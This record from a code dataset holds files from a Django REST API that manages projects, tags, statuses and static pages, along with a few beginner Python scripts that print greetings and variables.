0.5400665402412415, "alphanum_fraction": 0.5932869911193848, "avg_line_length": 24.423076629638672, "blob_id": "8cddf862c5c2bef4b7d54396afc73ade6ecaa18a", "content_id": "c86ec821ec2ff78ccad5698a4d2385b8bfe14b5d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3307, "license_type": "no_license", "max_line_length": 78, "num_lines": 130, "path": "/sharespace/codes/other/simple.py", "repo_name": "Jeff182/CJ", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport sys,os\nsys.path.insert(1,'../../')\nimport numpy as np\nimport pylab as py\nimport tools\nfrom tools import tex,plot_band,fill_between\nimport lhapdf\nimport matplotlib.gridspec as gridspec\nfrom matplotlib import rc\nrc('font',**{'family':'sans-serif','sans-serif':['Helvetica']})\nrc('text',usetex=True)\nfrom master import FITPACK\n\n\n# initialize PDF instances\nHERA15=lhapdf.mkPDFs('HERAPDF15LO_EIG')\nMMHT14=lhapdf.mkPDFs('MMHT2014lo68cl')\nMSTW08=lhapdf.mkPDFs('MSTW2008lo68cl')\n\n# dictionary for pdg flav idx\npdgmap= {'u':2,'d':1,'ub':-2,'db': -1,'s':3,'g':21}\n\n# simple function to access lhad pdfs\nget_pdfs = lambda flav,x,Q2,iset,grp: 
grp[iset].xfxQ2(pdgmap[flav],x,Q2)\n\n# load CJ15 from fitpack data \nfname='data/CDBONN_KP_1_LO_6.pdf'\nCJ15=FITPACK().get_PDFs(fname)\n\n# dictionary for labels\nlabmap = {}\nlabmap['u'] = '$xu(x)$'\nlabmap['d'] = '$xd(x)$'\nlabmap['ub'] = r'$x\\bar{u}(x)$'\nlabmap['db'] = r'$x\\bar{d}(x)$'\nlabmap['s'] = '$xs(x)$'\nlabmap['g'] = '$xg(x)$'\n\n# dictionary for grp == groups \ngrpmap = {}\ngrpmap['HERA15'] = {'grp':HERA15,'color':'g-'}\ngrpmap['MMHT14'] = {'grp':MMHT14,'color':'b-'}\ngrpmap['MSTW08'] = {'grp':MSTW08,'color':'b:'}\n\n# dictionary for ylims \nymap={}\nymap['u'] ={'min':0.0,'max':0.8}\nymap['d'] ={'min':0.0,'max':0.6}\nymap['ub']={'min':0.0,'max':0.6}\nymap['db']={'min':0.0,'max':0.6}\nymap['s'] ={'min':0.0,'max':0.6}\nymap['g'] ={'min':0.0,'max':20.0}\n\n# dictionary for plot location \ngs = gridspec.GridSpec(3,2) # specify plotting grid geometry\ngs.update(left=0.1,right=0.98,wspace=0.3,hspace=0.1,top=0.98,bottom=0.1)\ngrid={}\ngrid['u'] = gs[0,0]\ngrid['d'] = gs[0,1]\ngrid['ub']= gs[1,0]\ngrid['db']= gs[1,1]\ngrid['s'] = gs[2,0]\ngrid['g'] = gs[2,1]\n\n\n# setup kinematics\nQ2=10.0\niset=0\n\n\n# make plot\nfor flav in ['u','d','ub','db','s','g']:\n\n ax=py.subplot(grid[flav])\n\n for grp in ['CJ15','HERA15','MMHT14','MSTW08']:\n\n if grp=='CJ15':\n X=CJ15['Q2'][Q2]['X']\n central=CJ15['Q2'][Q2]['x'+flav]\n error=CJ15['Q2'][Q2]['err-x'+flav]*10\n\n #args={} \n #args['ax']=ax\n #args['x']=X\n #args['central']=central\n #args['lower']=central-error\n #args['upper']=central+error\n #args['central color']='r'\n #args['central line style']='-'\n #args['band color']='#FFFF00'\n #args['label']=tex(grp)\n #CJ_Legend = plot_band(args)\n p1,=ax.plot(X,central,'r-')\n p2=fill_between(X,central-error,central+error,ax=ax,\n facecolor='#FFFF00',\n edgecolor='#FFFF00',\n alpha=1.0,hatch=None)\n\n else:\n X=np.linspace(1e-3,0.9,1000)\n grp_=grpmap[grp]['grp']\n col=grpmap[grp]['color']\n ax.plot(X,[get_pdfs(flav,x,Q2,iset,grp_) for x in X],col,label=tex(grp))\n\n # make legend\n if flav=='g': \n H_,L_ = ax.get_legend_handles_labels()\n H=[(p2,p1)]\n L=[tex('CJ15')]\n for h in H_: H.append(h)\n for l in L_: L.append(l)\n ax.legend(H,L,loc=1,frameon=0,fontsize=15)\n\n # setup axis\n ax.semilogx()\n ax.set_xlim(1e-3,1.0)\n ax.set_ylim(ymap[flav]['min'],ymap[flav]['max'])\n if flav!='s' and flav!='g': ax.set_xticks([])\n ax.set_xlabel('$x$',size=20)\n ax.set_ylabel(labmap[flav],size=20)\n\n ## write info\n if flav=='u': \n ax.text(0.1,0.1,'$Q^2=$'+tex('~10~GeV^2~LO'),\n transform=ax.transAxes,size=15)\n\n\npy.savefig('plots/LOfits.pdf')\n\n\n" }, { "alpha_fraction": 0.5482555627822876, "alphanum_fraction": 0.5777072906494141, "avg_line_length": 24.367816925048828, "blob_id": "a6cb158b3fc9ec8fcc95a97f3bef1c7cfa2acb4d", "content_id": "4e6cb261e787a0b2fd34fcd85684c9eab32d7d08", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2207, "license_type": "no_license", "max_line_length": 74, "num_lines": 87, "path": "/sharespace/codes/Wasy.py", "repo_name": "Jeff182/CJ", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport sys,os\nsys.path.insert(1,'../../')\nimport numpy as np\nimport pylab as py\nimport tools\nfrom tools import tex,plot_band,fill_between\nimport lhapdf\nimport matplotlib.gridspec as gridspec\nfrom matplotlib import rc\nrc('font',**{'family':'sans-serif','sans-serif':['Times-Roman']})\nrc('text',usetex=True)\nimport pandas as pd\nfrom scipy.interpolate import interp1d\n\nclass WASY(object):\n\n def __init__(self):\n 
self.load_data()\n self.make_plot()\n\n def load_data(self):\n F=open('../CJ15data/CJ15_NLO_KP_AV18/CJ15_Wasym.dat')\n L=F.readlines()\n F.close()\n L=[l.strip() for l in L]\n L=[l for l in L if l!='']\n H=L[0].split()\n L=[l.split() for l in L[1:]]\n DF=pd.DataFrame(L,columns=H)\n DF=DF.convert_objects(convert_numeric=True)\n\n D={}\n D['CDF_Wasy'] = DF[DF.ITYPE=='CDF_Wasy']\n D['D0_Wasy'] = DF[DF.ITYPE=='D0_Wasy']\n self.D=D\n\n def make_plot(self):\n D=self.D\n ax=py.subplot(111)\n\n Y=D['D0_Wasy']['Y']\n T=D['D0_Wasy']['THEORY']\n ET=D['D0_Wasy']['ERROR']\n\n iT= interp1d(Y,T,kind='cubic')\n iET= interp1d(Y,ET, kind='cubic')\n Y=np.linspace(np.amin(Y),np.amax(Y),100)\n\n T=10\n p2=fill_between(Y,iT(Y)-iET(Y)*T,iT(Y)+iET(Y)*T,\n ax=ax,\n facecolor='yellow', \n edgecolor='yellow')\n p1,=ax.plot(Y,iT(Y),'r-')\n H=[(p2,p1)] \n L=[tex('CJ15')]\n\n dmap={}\n dmap['CDF_Wasy'] = {'color':'g','marker':'o'}\n dmap['D0_Wasy'] = {'color':'b','marker':'^'}\n\n for k in D.keys():\n color=dmap[k]['color']\n marker=dmap[k]['marker']\n markersize=4\n p3=ax.errorbar(D[k]['Y'],D[k]['DATA'],\\\n yerr=D[k]['DERROR'],fmt=color+marker,mfc=color,mec=color,\\\n markersize=markersize,zorder=1,alpha=0.9)\n H.append(p3)\n L=[tex('CJ15'),tex('CDF'),tex('D\\O')]\n\n ax.set_xlabel(r'$y_W$',size=25) \n ax.set_ylabel(r'$A_W$',size=25)\n\n ax.legend(H,L,frameon=0,loc=3,fontsize=22,numpoints=1,\\\n bbox_to_anchor=(0.02, 0.65))\n \n ##ax.text(0.5,0.8,tex('nrep=%d'%nrows),transform=ax.transAxes,size=20)\n py.tick_params(axis='both',labelsize=20)\n py.tight_layout()\n py.savefig('gallery/Wasy.pdf')\n py.close()\n\nif __name__=='__main__':\n\n WASY()\n" }, { "alpha_fraction": 0.5655391216278076, "alphanum_fraction": 0.6099365949630737, "avg_line_length": 20.386363983154297, "blob_id": "0108cc1bdc9ae918dc2dcb80ef07b0dced503748", "content_id": "206ade0d31fed0134ceceeb540b19ab0a6677eb6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 946, "license_type": "no_license", "max_line_length": 63, "num_lines": 44, "path": "/sharespace/codes/other/db_ub.py", "repo_name": "Jeff182/CJ", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport sys,os\nsys.path.insert(1,'../../')\nimport numpy as np\nimport pylab as py\nimport tools\nfrom tools import tex,plot_band,fill_between\nimport lhapdf\nimport matplotlib.gridspec as gridspec\nfrom matplotlib import rc\nrc('font',**{'family':'sans-serif','sans-serif':['Helvetica']})\nrc('text',usetex=True)\nfrom master import COMPOSER,FITPACK\n\ndef main():\n\n T=10\n Q2=100\n X=np.linspace(1e-3,0.4)\n\n CJ=COMPOSER(name='CJ15_NLO_KP_AV18')\n d=CJ.get_xpdf('db-ub',X=X,Q2=Q2)\n\n ax=py.subplot(111)\n p1,=ax.plot(X,d['xf0']/X,color='r',ls='-')\n p2=fill_between(X,\n (d['xf0']-d['dxf-']*T)/X,\n (d['xf0']+d['dxf+']*T)/X,\n ax=ax,\n facecolor='r',\n edgecolor='none',\n alpha=0.5)\n\n H=[(p2,p1)]\n L=[tex('CJ15')+'\\ $(T=%d)$'%T]\n ax.legend(H,L,loc=1,frameon=0,fontsize=20)\n ax.set_ylim(-0.2,1.2)\n ax.axhline(0,ls='--',color='k',alpha=0.5)\n\n py.savefig('gallery/db_ub.pdf')\n\nif __name__=='__main__':\n\n main()\n\n\n\n\n\n" }, { "alpha_fraction": 0.5476884841918945, "alphanum_fraction": 0.5897542834281921, "avg_line_length": 24.817203521728516, "blob_id": "6f9544d6a1e4e651ac6f3b36380dae885656c0af", "content_id": "8ae19f479a4809ba5f51d00ba9693ad2c33d3cb5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2401, "license_type": "no_license", "max_line_length": 73, "num_lines": 93, 
"path": "/sharespace/codes/wasy_NS.py", "repo_name": "Jeff182/CJ", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport sys,os\nsys.path.insert(1,'../../')\nimport numpy as np\nimport pylab as py\nimport tools\nfrom tools import tex,plot_band,fill_between\nimport lhapdf\nimport matplotlib.gridspec as gridspec\nfrom matplotlib import rc\nrc('font',**{'family':'sans-serif','sans-serif':['Helvetica']})\nrc('text',usetex=True)\nimport pandas as pd\n\nclass WASY(object):\n\n def __init__(self):\n self.load_data()\n self.define_plotter_geometry()\n self.make_plot()\n\n def load_data(self):\n F=open('../CJ15data/CJ15_NLO_KP_AV18/CJ15_Wasym.dat')\n L=F.readlines()\n F.close()\n L=[l.strip() for l in L]\n L=[l for l in L if l!='']\n H=L[0].split()\n L=[l.split() for l in L[1:]]\n DF=pd.DataFrame(L,columns=H)\n DF=DF.convert_objects(convert_numeric=True)\n\n D={}\n D['cdfLasy05'] = DF[DF.ITYPE=='cdfLasy05']\n D['d0Lasy_e15']= DF[DF.ITYPE=='d0Lasy_e15']\n D['d0Lasy13'] = DF[DF.ITYPE=='d0Lasy13']\n D['CDF_Wasy'] = DF[DF.ITYPE=='CDF_Wasy']\n D['D0_Wasy'] = DF[DF.ITYPE=='D0_Wasy']\n self.D=D\n\n def define_plotter_geometry(self):\n\n ncols=2\n nrows=3\n py.figure(figsize=(ncols*4,nrows*3))\n gs = gridspec.GridSpec(nrows,ncols)\n gs.update(left=0.13,right=0.98,wspace=0.4,hspace=0.3,\\\n top=0.98,bottom=0.12)\n \n AX={}\n AX['cdfLasy05'] = py.subplot(gs[0,0])\n AX['d0Lasy_e15'] = py.subplot(gs[0,1])\n AX['d0Lasy13'] = py.subplot(gs[1,0])\n AX['CDF_Wasy'] = py.subplot(gs[1,1])\n AX['D0_Wasy'] = py.subplot(gs[2,0])\n self.AX=AX\n\n def plot_dataset(self,dataset,T=10):\n k=dataset\n D=self.D\n ax=self.AX[k]\n data=D[k]['DATA']\n derr=D[k]['DERROR']\n theory=D[k]['THEORY']\n terr=D[k]['ERROR']\n y=D[k]['Y']\n p1,=ax.plot(y,theory,'r-')\n p2=fill_between(y,theory-terr*T,theory+terr*T,\n ax=ax,\n facecolor='yellow',\n edgecolor='yellow')\n p3=ax.errorbar(y,data,yerr=derr,fmt='k.')\n return (p2,p1),p3\n\n def make_plot(self):\n AX=self.AX\n for k in AX.keys(): \n p21,p3=self.plot_dataset(k)\n AX[k].set_xlabel(r'$y$',size=20)\n AX[k].set_ylabel(tex(k.replace('_','')),size=20)\n\n ax=AX['cdfLasy05']\n ax.legend([p21,p3],[tex('CJ15'),tex('data')]\\\n ,frameon=0,loc=3,fontsize=20,numpoints=1)\n\n \n #ax.text(0.5,0.8,tex('nrep=%d'%nrows),transform=ax.transAxes,size=20)\n py.savefig('gallery/wasy.pdf')\n py.close()\n\nif __name__=='__main__':\n\n WASY()\n" } ]
21
multiplayground/mlp_api
https://github.com/multiplayground/mlp_api
a0894a633717b0ff3caa6872d8fe9849df95a27e
b65b1651d45f6cb1552a020bae51b125357ee47b
28c5654a9efab56cd4559b9e69d6e24ff9b6d28b
refs/heads/master
2020-05-18T00:16:15.989855
2019-05-02T05:42:37
2019-05-02T05:42:37
184,056,910
1
3
null
2019-04-29T11:18:01
2019-05-19T18:43:07
2020-02-12T00:10:18
Python
[ { "alpha_fraction": 0.5735455751419067, "alphanum_fraction": 0.5867179036140442, "avg_line_length": 25.808822631835938, "blob_id": "47c72c0aa25245b0fb6df9775a4efebe1a8ee8ea", "content_id": "82b81fdfe237ee1d3adaabf76c81dcc8d140ffe3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1822, "license_type": "no_license", "max_line_length": 77, "num_lines": 68, "path": "/staticPageApp/models.py", "repo_name": "multiplayground/mlp_api", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.template.defaultfilters import truncatechars\n\nfrom pytils.translit import slugify\nfrom tinymce.models import HTMLField\n\n\nclass Page(models.Model):\n \"\"\" Page Class is designed to create separate Pages of this Project. \"\"\"\n\n title = models.CharField(\n _('title'),\n max_length=255,\n unique=True,\n help_text=_(\"At most 255 characters.\")\n )\n slug = models.SlugField(\n _('slug'),\n max_length=128,\n blank=True,\n unique=True,\n help_text=_(\"At most 128 characters, allowed characters:'-_a-z0-9'.\")\n )\n seo_description = models.CharField(\n _('seo description'),\n max_length=100,\n help_text=_(\"At most 100 characters.\")\n )\n content = HTMLField(\n _('content')\n )\n data_of_created = models.DateTimeField(\n _('data of create'),\n auto_now_add=True,\n auto_now=False\n )\n data_of_updated = models.DateTimeField(\n _('data of updated'),\n auto_now_add=False,\n auto_now=True\n )\n is_activate = models.BooleanField(\n _('is activate'),\n default=True\n )\n\n class Meta:\n verbose_name = _(\"static page\")\n verbose_name_plural = _(\"static pages\")\n\n def save(self, *args, **kwargs):\n \"\"\"\n If the field is not filled when saving, it is automatically\n filled with the page header of the page\n \"\"\"\n self.slug = slugify(self.title)\n super(Page, self).save(*args, **kwargs)\n\n def short_title(self):\n \"\"\"\n The function of limiting the length of the page header to\n 50 characters\n \"\"\"\n return truncatechars(self.title, 50)\n\n def __str__(self):\n return self.title" }, { "alpha_fraction": 0.6693548560142517, "alphanum_fraction": 0.6693548560142517, "avg_line_length": 30, "blob_id": "632c800bc5f1d0209b65f7c70f6a280be0076d94", "content_id": "250db4dcab59a72a4d88cc5d8254e0dcb6f6443b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 372, "license_type": "no_license", "max_line_length": 56, "num_lines": 12, "path": "/projectApp/permissions.py", "repo_name": "multiplayground/mlp_api", "src_encoding": "UTF-8", "text": "from rest_framework import permissions\n\nclass IsAdminUserOrReadOnly(permissions.BasePermission):\n \"\"\"\n Allows retrieve API data to any user, and\n create or destroy it only to administrators.\n \"\"\"\n def has_permission(self, request, view):\n return (\n request.user.is_staff or\n request.method in permissions.SAFE_METHODS\n )\n" }, { "alpha_fraction": 0.5439469218254089, "alphanum_fraction": 0.5439469218254089, "avg_line_length": 22.230770111083984, "blob_id": "fe14c398c487e590ebb4899f815afee21a33319b", "content_id": "7566815122e7da8c45bda51dfacafb1072eac073", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 603, "license_type": "no_license", "max_line_length": 60, "num_lines": 26, "path": "/staticPageApp/admin.py", "repo_name": "multiplayground/mlp_api", "src_encoding": "UTF-8", "text": "from django.contrib import 
admin\nfrom .models import Page\n\n\n@admin.register(Page)\nclass PageAdmin(admin.ModelAdmin):\n list_display = (\n 'id',\n 'short_title',\n 'slug',\n 'is_activate',\n 'data_of_updated',\n 'data_of_created'\n )\n list_display_links = ('short_title',)\n list_filter = ('is_activate',)\n readonly_fields = ('data_of_updated', 'data_of_created')\n fields = (\n 'title',\n 'slug',\n 'seo_description',\n 'content',\n 'is_activate',\n ('data_of_updated', 'data_of_created')\n )\n save_on_top = True" }, { "alpha_fraction": 0.7674418687820435, "alphanum_fraction": 0.7713178396224976, "avg_line_length": 22.454545974731445, "blob_id": "40790756a62d9b192825c459ba1f661e1d164385", "content_id": "719fdf723086623aeeea771d08bc7b6baa071c43", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 258, "license_type": "no_license", "max_line_length": 43, "num_lines": 11, "path": "/projectApp/urls.py", "repo_name": "multiplayground/mlp_api", "src_encoding": "UTF-8", "text": "from django.urls import include, path\nfrom rest_framework import routers\nfrom projectApp.views import ProjectViewSet\n\n\nrouter = routers.DefaultRouter()\nrouter.register(r'project', ProjectViewSet)\n\nurlpatterns = [\n path('api/v1/', include(router.urls)),\n]\n" }, { "alpha_fraction": 0.6076260805130005, "alphanum_fraction": 0.6076260805130005, "avg_line_length": 29.873416900634766, "blob_id": "aadf9454e864366a7f9cf208ff89f76eab17b7a1", "content_id": "80d38cdf8e3c046a5c97e36b980c006e7492850c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2439, "license_type": "no_license", "max_line_length": 73, "num_lines": 79, "path": "/projectApp/serializers.py", "repo_name": "multiplayground/mlp_api", "src_encoding": "UTF-8", "text": "from rest_framework import serializers\nfrom projectApp.models import Project, Tag, Status\n\n\nclass TagSerializer(serializers.ModelSerializer):\n class Meta:\n model = Tag\n fields = ('title', 'slug')\n extra_kwargs = {\n 'title': {'validators': []},\n 'slug': {'validators': []}\n }\n\nclass StatusSerializer(serializers.ModelSerializer):\n class Meta:\n model = Status\n fields = ('title', )\n extra_kwargs = {'title': {'validators': []}}\n\nclass ProjectSerializer(serializers.ModelSerializer):\n status = StatusSerializer()\n tags = TagSerializer(many=True)\n\n class Meta:\n model = Project\n fields = '__all__'\n\n # Validation of relational fields:\n\n def validate_status(self, status_data):\n title = status_data['title']\n if not Status.objects.filter(title=title).exists():\n issue = \"Status '%s' doesn't exist.\" % title\n raise serializers.ValidationError(issue)\n\n return status_data\n\n def validate_tags(self, tag_data_list):\n wrong_tags = []\n\n for tag_data in tag_data_list:\n title, slug = tag_data.values()\n if not Tag.objects.filter(title=title, slug=slug).exists():\n wrong_tags.append(title)\n\n if not wrong_tags:\n return tag_data_list\n\n issue = \"Problem with next tags: '%s'\" % \", \".join(wrong_tags)\n raise serializers.ValidationError(issue)\n\n # Setting write methods explicitly:\n\n def create(self, validated_data):\n status_data = validated_data.pop('status')\n tags_data = validated_data.pop('tags')\n\n status = Status.objects.get(**status_data)\n tags = [Tag.objects.get(**td) for td in tags_data]\n\n project = Project.objects.create(**validated_data, status=status)\n project.tags.set(tags)\n return project\n\n def update(self, instance, validated_data):\n status_data = 
validated_data.pop('status')\n tags_data = validated_data.pop('tags')\n\n status = Status.objects.get(**status_data)\n tags = [Tag.objects.get(**td) for td in tags_data]\n\n instance.status = status\n instance.tags.set(tags)\n for key, value in validated_data.items():\n setattr(instance, key, value)\n\n updated_fields = ['status'] + list(validated_data.keys())\n instance.save(update_fields=updated_fields)\n return instance\n" }, { "alpha_fraction": 0.7798742055892944, "alphanum_fraction": 0.7798742055892944, "avg_line_length": 33.07143020629883, "blob_id": "2ce90175c2757d87f344f4fbde40dc5fc5f3c3fd", "content_id": "d2581d0905cfce79f837211474f1df47b9abfee0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 477, "license_type": "no_license", "max_line_length": 58, "num_lines": 14, "path": "/projectApp/views.py", "repo_name": "multiplayground/mlp_api", "src_encoding": "UTF-8", "text": "from rest_framework import viewsets\nfrom projectApp.models import Project\nfrom projectApp.serializers import ProjectSerializer\nfrom projectApp.permissions import IsAdminUserOrReadOnly\n\n\nclass ProjectViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows users to be viewed or edited.\n \"\"\"\n queryset = Project.objects.filter(is_active=True)\n serializer_class = ProjectSerializer\n permission_classes = (IsAdminUserOrReadOnly,)\n lookup_field = 'slug'\n" }, { "alpha_fraction": 0.5482233762741089, "alphanum_fraction": 0.720812201499939, "avg_line_length": 16.909090042114258, "blob_id": "6f4c227ad178acd6d554159a131048752ee0731a", "content_id": "e11939b0eb24f32997e1f13f25c36a9c613f4f83", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 197, "license_type": "no_license", "max_line_length": 26, "num_lines": 11, "path": "/requirements.txt", "repo_name": "multiplayground/mlp_api", "src_encoding": "UTF-8", "text": "Django==2.2\ndjango-tinymce==2.8.0\ndjangorestframework==3.9.2\nPillow==6.0.0\npsycopg2==2.8.2\npsycopg2-binary==2.8.2\npython-slugify==3.0.2\npytils==0.3\npytz==2019.1\nsqlparse==0.3.0\ntext-unidecode==1.2\n" }, { "alpha_fraction": 0.5726276636123657, "alphanum_fraction": 0.5840522050857544, "avg_line_length": 27.41059684753418, "blob_id": "7b5ff341904136b01fa48cb30e11be38d628b95b", "content_id": "91dd85d6fbd2bb3801bd09de65fa5b4bdebeaf8c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4289, "license_type": "no_license", "max_line_length": 79, "num_lines": 151, "path": "/projectApp/models.py", "repo_name": "multiplayground/mlp_api", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.core.validators import (\n MinValueValidator,\n MaxValueValidator,\n FileExtensionValidator\n)\nfrom django.utils.text import slugify\n\nfrom tinymce.models import HTMLField\nfrom projectApp.validators import FileSizeValidator\n\n\nclass Project(models.Model):\n \"\"\"Represents project, published on the web-site.\"\"\"\n\n title = models.CharField(\n _('title'),\n max_length=255,\n unique=True,\n help_text=_(\"At most 255 characters.\")\n )\n slug = models.SlugField(\n _('slug'),\n max_length=128,\n blank=True,\n null=True,\n unique=True,\n help_text=_(\"At most 128 characters, allowed characters:'-_a-z0-9'.\")\n )\n preview = models.ImageField(\n _('preview'),\n upload_to='projectApp/previews/',\n validators=[\n FileExtensionValidator(allowed_extensions=['jpg', 
'jpeg']),\n FileSizeValidator(2.5 * 1024 * 1024)\n ],\n blank=True,\n null=True\n )\n short_description = models.TextField(_('short description'))\n full_description = HTMLField(_('full description'))\n number_of_people = models.PositiveSmallIntegerField(\n _('number of people'),\n default=1,\n validators=[MinValueValidator(1), MaxValueValidator(1000)],\n help_text=_(\"Positive integer in range 1 to 1000 inclusive.\")\n )\n date_of_created = models.DateTimeField(\n _('date of creation'),\n auto_now_add = True,\n auto_now = False\n )\n date_of_updated = models.DateTimeField(\n _('date of update'),\n auto_now_add = False,\n auto_now = True\n )\n date_of_end = models.DateTimeField(_('date of end'), null=True, blank=True)\n is_active = models.BooleanField(_('is active'), default=True)\n\n status = models.ForeignKey(\n 'Status',\n null=True,\n on_delete=models.SET_NULL,\n verbose_name=_('status')\n )\n tags = models.ManyToManyField(\n 'Tag',\n related_name='projects',\n verbose_name=_('tags')\n )\n\n class Meta:\n verbose_name = _(\"enrolled project\")\n verbose_name_plural = _(\"enrolled projects\")\n\n def save(self, *args, **kwargs):\n # Update slug field, if it's empty - write slugified title there:\n self.slug = self.slug.lower() if self.slug else slugify(self.title)\n\n # Check preview, if it has updated, remove old image:\n try:\n old_self = Project.objects.get(id=self.id)\n if (not self.preview) or self.preview != old_self.preview:\n old_self.preview.delete(save=False)\n except:\n # If it's a new project or a first preview, just don't do nothing:\n pass\n\n super().save(*args, **kwargs)\n\n def __str__(self):\n return \"'%s' project.\" % self.title\n\nclass Tag(models.Model):\n \"\"\"\n Represents tag which marks programming language or technology,\n used in some project. Project can have many tags, so it has\n one to many relation with Project model.\n \"\"\"\n\n title = models.CharField(\n _('title'),\n max_length=50,\n unique=True,\n help_text=_(\"At most 50 characters.\")\n )\n slug = models.SlugField(\n _('slug'),\n max_length=50,\n unique=True,\n null=True,\n help_text=_(\"At most 50 characters, allowed characters:'-_a-z0-9'.\")\n )\n\n class Meta:\n verbose_name = _(\"project's tag\")\n verbose_name_plural = _(\"project's tags\")\n\n def save(self, *args, **kwargs):\n \"\"\"\n Before storing data in database,\n converts slug string to lower case.\n \"\"\"\n\n self.slug = self.slug.lower()\n super().save(*args, **kwargs)\n\n def __str__(self):\n return self.title\n\nclass Status(models.Model):\n \"\"\"\n Represents status of some project.\n (for ex. 
'active', 'complete')\n \"\"\"\n\n title = models.CharField(\n _('title'),\n max_length=16,\n unique=True,\n help_text=_(\"At most 16 characters.\")\n )\n\n class Meta:\n verbose_name = _(\"project's status\")\n verbose_name_plural = _(\"project's statuses\")\n\n def __str__(self):\n return \"Status: '%s'.\" % self.title" }, { "alpha_fraction": 0.5611233711242676, "alphanum_fraction": 0.5655286312103271, "avg_line_length": 29.779661178588867, "blob_id": "9c7f7088c39dc644f979afe8ea76f09da56b0488", "content_id": "a11a72eb558996bd75cd04804dd57ad80ba3e5a6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1816, "license_type": "no_license", "max_line_length": 75, "num_lines": 59, "path": "/projectApp/validators.py", "repo_name": "multiplayground/mlp_api", "src_encoding": "UTF-8", "text": "from django.core.exceptions import ValidationError\nfrom django.utils.translation import gettext_lazy as _\nfrom django.utils.deconstruct import deconstructible\n\n@deconstructible\nclass FileSizeValidator:\n \"\"\"\n Takes maximum size, allowed for a file, in bytes.\n Creates validator for a FileField.\n \"\"\"\n message = _(\n \"Ensure that file size are less than %(max_size)s %(prefix)sBytes.\"\n )\n code = 'limit_file_size'\n\n _decimal_prefixes = ('k', 'M', 'G')\n\n\n def __init__(self, max_size, message=None, code=None):\n self.max_size = max_size\n if message is not None:\n self.message = message\n if code is not None:\n self.code = code\n\n def __call__(self, value):\n if value.size > self.max_size:\n raise ValidationError(\n self.message,\n code=self.code,\n params=self._get_pretty_size_params()\n )\n\n def __eq__(self, other):\n return (\n isinstance(other, self.__class__) and\n self.max_size == other.max_size and\n self.message == other.message and\n self.code == other.code\n )\n\n def _get_pretty_size_params(self):\n \"\"\"\n Returns a dictionary with message parameters\n (max_size, prefix) as keys, and values, depends on\n maximum allowed bytes for a file.\n \"\"\"\n max_size = self.max_size\n prefix = ''\n\n options_quantity = len(FileSizeValidator._decimal_prefixes)\n for i in range(options_quantity, 0, -1):\n base = 1024 ** i\n if self.max_size >= base:\n max_size /= base\n prefix = FileSizeValidator._decimal_prefixes[i - 1]\n break\n\n return {'max_size':round(max_size, 2), 'prefix':prefix}\n" }, { "alpha_fraction": 0.7105882167816162, "alphanum_fraction": 0.7105882167816162, "avg_line_length": 25.5625, "blob_id": "55555cf7f1207d67a173bdfb0dd395cf631383eb", "content_id": "c970f7832bacffea56d49d2b5c97525072d433cb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 425, "license_type": "no_license", "max_line_length": 50, "num_lines": 16, "path": "/projectApp/admin.py", "repo_name": "multiplayground/mlp_api", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom projectApp.models import Project, Tag, Status\n\n@admin.register(Project)\nclass ProjectAdmin(admin.ModelAdmin):\n pass\n\n@admin.register(Tag)\nclass TagAdmin(admin.ModelAdmin):\n list_display = ('id', 'title', 'slug')\n list_display_links = ('title',)\n\n@admin.register(Status)\nclass StatusAdmin(admin.ModelAdmin):\n list_display = ('id', 'title')\n list_display_links = ('title',)\n" } ]
10
ivan-yosifov/python-2019
https://github.com/ivan-yosifov/python-2019
b3da0fa31ec952b1cfde5d976189ae458ed07229
d5d73351e957281de05a796ae7087a82521cac54
ca95dc5cf00fb19c2cb1c7a53ff77c42fcd7c102
refs/heads/master
2020-12-05T11:28:37.794414
2020-01-06T13:10:41
2020-01-06T13:10:41
232,095,080
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.713178277015686, "alphanum_fraction": 0.713178277015686, "avg_line_length": 9.833333015441895, "blob_id": "010f85461117a8759eeaf5efa6f032586fbb1992", "content_id": "55b33dd66d7015e8c30374f15c91799500231588", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 129, "license_type": "no_license", "max_line_length": 20, "num_lines": 12, "path": "/1hello.py", "repo_name": "ivan-yosifov/python-2019", "src_encoding": "UTF-8", "text": "'''\nMulti-line comment\nenjoy\nhahahha\n'''\nimport os\n\n# clear terminal\nos.system('clear')\n\n# print Hello World\nprint('Hello World')" }, { "alpha_fraction": 0.6477272510528564, "alphanum_fraction": 0.6704545617103577, "avg_line_length": 10.125, "blob_id": "01a1c89f0654da5816ce13b81f4c570a2b7b0fdb", "content_id": "2d307ab9378e2b7597b9af5a842fbfcdca8b2491", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 88, "license_type": "no_license", "max_line_length": 20, "num_lines": 8, "path": "/2variables.py", "repo_name": "ivan-yosifov/python-2019", "src_encoding": "UTF-8", "text": "import os\nos.system('clear')\n\nfull_name = 'Megan Fox'\nage = 30\n\nprint(full_name)\nprint(age)" }, { "alpha_fraction": 